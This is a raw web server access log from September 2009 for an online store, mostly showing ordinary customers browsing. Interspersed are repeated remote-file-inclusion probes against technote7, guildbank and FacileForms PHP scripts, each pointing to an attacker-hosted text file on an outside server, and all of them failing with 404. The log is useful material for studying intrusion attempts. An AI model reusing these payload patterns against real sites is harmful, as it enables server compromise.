92.50.143.90 - - [04/Sep/2009:04:13:23 -0400] "GET /logs/access_log.Q109061600//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
92.50.143.90 - - [04/Sep/2009:04:13:28 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
92.50.143.90 - - [04/Sep/2009:04:13:28 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
92.50.143.90 - - [04/Sep/2009:04:13:28 -0400] "GET /logs/access_log.Q109061600//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
92.50.143.90 - - [04/Sep/2009:04:13:28 -0400] "GET /logs/access_log.Q109071100//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
222.239.227.142 - - [04/Sep/2009:04:13:28 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.239.227.142 - - [04/Sep/2009:04:13:28 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.239.227.142 - - [04/Sep/2009:04:13:28 -0400] "GET /logs/access_log.Q109061600//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
222.239.227.142 - - [04/Sep/2009:04:13:29 -0400] "GET /logs/access_log.Q109071100//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
220.247.11.218 - - [04/Sep/2009:04:13:33 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B77400DF70700D59501U+M37+ENG HTTP/1.1" 200 57761 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B774C03478700CC6501U+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; YJSG3)"
222.239.227.142 - - [04/Sep/2009:04:13:39 -0400] "GET /logs/access_log.Q109061600//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
222.239.227.142 - - [04/Sep/2009:04:13:39 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.239.227.142 - - [04/Sep/2009:04:13:39 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.239.227.142 - - [04/Sep/2009:04:13:39 -0400] "GET /logs/access_log.Q109071100//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
92.50.143.90 - - [04/Sep/2009:04:13:41 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
92.50.143.90 - - [04/Sep/2009:04:13:41 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
92.50.143.90 - - [04/Sep/2009:04:13:41 -0400] "GET /logs/access_log.Q109061600//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
92.50.143.90 - - [04/Sep/2009:04:13:41 -0400] "GET /logs/access_log.Q109071100//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
220.247.11.218 - - [04/Sep/2009:04:13:43 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B774102475700E23501U+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; YJSG3)"
220.247.11.218 - - [04/Sep/2009:04:13:41 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B774102475700E23501U+M37+ENG HTTP/1.1" 200 76387 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B77400DF70700D59501U+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; YJSG3)"
220.247.11.218 - - [04/Sep/2009:04:13:44 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B774102475700E23501U+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; YJSG3)"
220.247.11.218 - - [04/Sep/2009:04:13:44 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B774102475700E23501U+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; YJSG3)"
92.50.143.90 - - [04/Sep/2009:04:13:50 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
92.50.143.90 - - [04/Sep/2009:04:13:50 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
92.50.143.90 - - [04/Sep/2009:04:13:50 -0400] "GET /logs/access_log.Q109061600%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
92.50.143.90 - - [04/Sep/2009:04:13:50 -0400] "GET /logs/access_log.Q109071100%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
92.50.143.90 - - [04/Sep/2009:04:13:57 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
222.239.227.142 - - [04/Sep/2009:04:13:58 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
211.43.202.66 - - [04/Sep/2009:04:14:05 -0400] "GET /logs/access_log.Q109081200/addons/guildbank/searcharrays.php?addonDir=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:04:14:05 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:04:14:05 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:04:14:05 -0400] "GET /logs/access_log.Q109071900/addons/guildbank/searcharrays.php?addonDir=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:04:14:07 -0400] "GET /logs/access_log.Q109081200/addons/guildbank/searcharrays.php?addonDir=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:04:14:07 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:04:14:07 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:04:14:07 -0400] "GET /logs/access_log.Q109071900/addons/guildbank/searcharrays.php?addonDir=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
222.239.227.142 - - [04/Sep/2009:04:14:08 -0400] "GET /logs/access_log.Q109081500//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
92.50.143.90 - - [04/Sep/2009:04:14:09 -0400] "GET /logs/access_log.Q109081500//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
92.50.143.90 - - [04/Sep/2009:04:14:22 -0400] "GET /logs/access_log.Q109051800%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
92.50.143.90 - - [04/Sep/2009:04:14:34 -0400] "GET /logs/access_log.Q109081500%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
92.50.143.90 - - [04/Sep/2009:04:14:51 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
92.50.143.90 - - [04/Sep/2009:04:14:51 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
92.50.143.90 - - [04/Sep/2009:04:14:51 -0400] "GET /logs/access_log.Q109061600//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
121.169.189.169 - - [04/Sep/2009:04:15:02 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG HTTP/1.1" 200 37504 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:04 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:04 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:04 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:04 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:04 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:04 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:04 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:04 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:04 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:04 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:04 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:04 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:04 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:04 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:04 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:05 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:05 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:05 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:05 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:05 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:05 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:05 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:05 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:05 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:05 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:18 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L018B784502A7F300315503U+M37+ENG HTTP/1.1" 200 76795 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B744901577300C69503T+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:21 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B784502A7F300315503U+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:21 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B784502A7F300315503U+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:21 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B784502A7F300315503U+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:24 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B784502A7F300315503U+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:25 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L018B784504877300465503U+M37+ENG HTTP/1.1" 200 45591 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:28 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B784504877300465503U+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
121.169.189.169 - - [04/Sep/2009:04:15:28 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B784504877300465503U+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
211.43.202.66 - - [04/Sep/2009:04:15:29 -0400] "GET /logs/access_log.Q109071900%20/addons/guildbank/searcharrays.php?addonDir=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:04:15:31 -0400] "GET /logs/access_log.Q109071900%20/addons/guildbank/searcharrays.php?addonDir=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
92.50.143.90 - - [04/Sep/2009:04:15:40 -0400] "GET /logs/access_log.Q109081300%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
92.50.143.90 - - [04/Sep/2009:04:15:47 -0400] "GET /logs/access_log.Q109070800%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
151.8.79.19 - - [04/Sep/2009:04:16:21 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.76"
114.4.8.14 - - [04/Sep/2009:04:16:23 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
92.50.143.90 - - [04/Sep/2009:04:16:27 -0400] "GET /logs/access_log.Q109060100%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:04:16:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.169.189.169 - - [04/Sep/2009:04:16:33 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L018B784C0CC7F3004D0503U+M37+ENG HTTP/1.1" 200 40492 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B784504877300465503U+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
